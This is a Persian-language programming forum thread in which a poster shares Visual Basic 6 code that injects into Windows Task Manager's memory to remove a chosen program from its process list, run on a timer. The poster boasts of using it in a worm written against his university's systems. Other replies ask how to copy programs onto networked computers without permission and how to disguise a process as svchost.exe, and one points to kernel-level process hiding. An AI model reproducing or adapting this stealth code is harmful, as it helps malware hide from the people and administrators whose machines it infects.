سلام .
فکر کنم این کدا خیلی بدردتون بخوره, خودم که پیداش کردم جدا کف کردم :کف:
امیدوارم

در راه خیر ازش استفاده کنید , درست مثل من ..... :بامزه:

--------------------------------------------------------
تو قسمت General


Private Type bkh
flag As Long
psz As Long
lParam As Long
pt As Long
vkDirection As Long
End Type
Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Private Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

--------------------------------------------------------------------------

تو General نباشه :


Private Sub Hide_Process(Name As String)
Dim pName As Long
Dim pType As Long
Dim l As Long
Dim Tid As Long
Dim hTid As Long
Dim pid As Long
Dim h As Long
Dim i As Long
Dim hProcess As Long
Dim f As bkh
Dim s As String
Dim bkh() As Byte
h = FindWindow(vbNullString, "Windows Task Manager")
KillTimer h, 0
h = FindWindowEx(h, 0, "#32770", vbNullString)
h = FindWindowEx(h, 0, "SysListView32", vbNullString)
If h = 0 Then Exit Sub
f.flag = 8 Or &H20
Call GetWindowThreadProcessId(h, pid)
hProcess = OpenProcess(1082, 0, pid)
bkh = StrConv(Name, vbFromUnicode)
pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)
WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l
f.psz = pName
pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
i = SendMessage(h, &H1000 + 13, 0, pType)
If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
VirtualFreeEx hProcess, pType, Len(f), &H8000
VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000
End Sub

--------------------------------------------------------------------------

حالا یه تایمر 5 ثانیه بذارید و ...


Hide_Process CStr(App.EXEName & ".exe")

--------------------------------------------------------------------------

کرمهای جدید این تکنولوژی رو دارن ... این کدا داغ داغ , خودمم یه کرم خفن واسه سیستمهای دانشگاه نوشتم که این کدا توش بکار رفته , جدا مفید ..........

کار جالبی بود حال کردم
راهی بلدی که بشه برنامه رو توی کامپیوتری که تو شبکه است و permission نداری کپی کنیم
البته شاید اینجا نباید می پرسیدم ولی جای دیگه ای هم سراغ نداشتم

خوشحالم که بدردتون خورد ...

راستش من خودم خیلی طالبم که بزنم تو کار شبکه و اینجور راه نفوذا

منتها وقتشو به اونصورت ندارم یه خورده هم تنبلم !!

درین زمینه Im Sorry کمکی از دستم بر نمیاد

لطفا کامل تر توضیح دهید
با تشکر
مثال

کدها و کارش واضح . توضیح درباره ی چی می خوای ؟؟

M8SPY_OK درست میگه . دلیل نمیشه اون چیزیو که آپ کرده بلد باشه

منم یه کتاب الکترونیکی چهارصدو خوردهای صفحه ای آپ کردم , خوب اگه قرار بود همشو بلد باشم که ........ !!

>>> آقا بستگی داره شما به این کدا چجوری نگا کنید . من شخصا کارکردش واسم مهمه, نه اینکه حالا مثلا چرا از User32.dll استفاده شده

حالا شما بگید شما چه توضیحی می خواین تا من عرض کنم خدمتتون ...

____________________________________

درد من حصار برکه نیست... درد زیستن با ماهیانی است که فکر دریا به ذهنشان خطور نکرده است

آقا به نظر من مهم اینه که کد رو بفهمی !

اگه واقعاً بفهمی کد چیکار می کنه چه اشکالی داره از روش کپی بگیریم و توی برنامه هامون ازش استفاده کنیم ؟؟ حالا حتماً نباید که بشینیم تایپش کنیم !

با شما موافقم , برنامه نویس خوب کسی که بتونه به نحو احسن از منبع(راهنما) استفاده کنه ...

دوستان عزیز یه سوال داشتم .

آیا میشه اسم فایل اجرا شده بطور مثال Example01.eXe باشه , ولی توی لیست Processes با

یه اسم دیگه مثل SVCHOST.eXe دیده بشه !!؟؟

اگه شدنیه که راهنمایی کنید .

البته این راه هم هست که فایل خودشو با یه اسم دیگه کپی کنه

و اون فایل رو صدا بزنه . از این راه نمی خوام استفاده کنم !

با تشکر

نه دوست عزیز !

زبانه Processes از پنجره Task Manager فقط پروسه هایی رو مشون میده در در حال حاضر در حال اجرا می باشند . پس اگه پروسه ای با اسم SVCHOST.eXe توی این پنجره مشاهده کردید مطمئن باشید که همچین فایلی با این اسم توی سیستم وجود داره و الآن در حالت اجرا می باشد .

فرمایش شما متین ,

ولی من در واقع می خوام که فایل با اسم جعلی بار بشه توی حافظه ...

آیا میشه ؟؟ یا بیخیالش شم ؟

آیا میشه اسم فایل اجرا شده بطور مثال Example01.eXe باشه , ولی توی لیست Processes با
یه اسم دیگه مثل SVCHOST.eXe دیده بشه !!؟؟

یه خورده قدیمی شد اما شاید کمک کنه؛
امروز بصورت اتفاقی به یکی از تاپیکهای قدیمی خودم برخوردم و فکر میکنم یکی از دوستان اونجا پاسخی داده بودند که سئوال شما رو جواب بده :
http://barnamenevis.org/forum/showthread.php?p=62862
پستهای شماره 7# و 8# رو نگاه کنید.

کسی میتونه این کد ها رو به زبان VB.NET هم بنویسه ؟
ظاهرا تو انجمن VB.NET ها کسی نمیتونه ، گفتم شما شاید بتونید

کسی میتونه این کد ها رو به زبان VB.NET هم بنویسه ؟
ظاهرا تو انجمن VB.NET ها کسی نمیتونه ، گفتم شما شاید بتونید
هرچند این تاپیک قیدمیه :چشمک: ولی خب جای بحث داره هنوز !

این کدها بدون شک مزخرف ترین روش رو پیاده سازی کردن ! برای کار اصولی شما باید از Driver ها استفاده کنی که کلاً با NET. جماعت نمیشه چنین کاری کرد توی لینک زیر یه نمونه هست که باید ازش استفاده کنی !
Using IOCTL codes (http://www.rohitab.com/discuss/topic/40304-using-ioctl-codes/)

نمونه ای که گفتم بیشتر برای آموزش استفاده از IOCTL هستش ولی یکی از ویژگی هاش اینه :
4) Hide running process using DKOM.

شما میتونی اون قسمت Application رو مثلا با VB.NET یا ... پیاده سازی کنی !

موفق باشید:لبخند:

من تست کردم در ویندوز 7 این روش جواب نمیده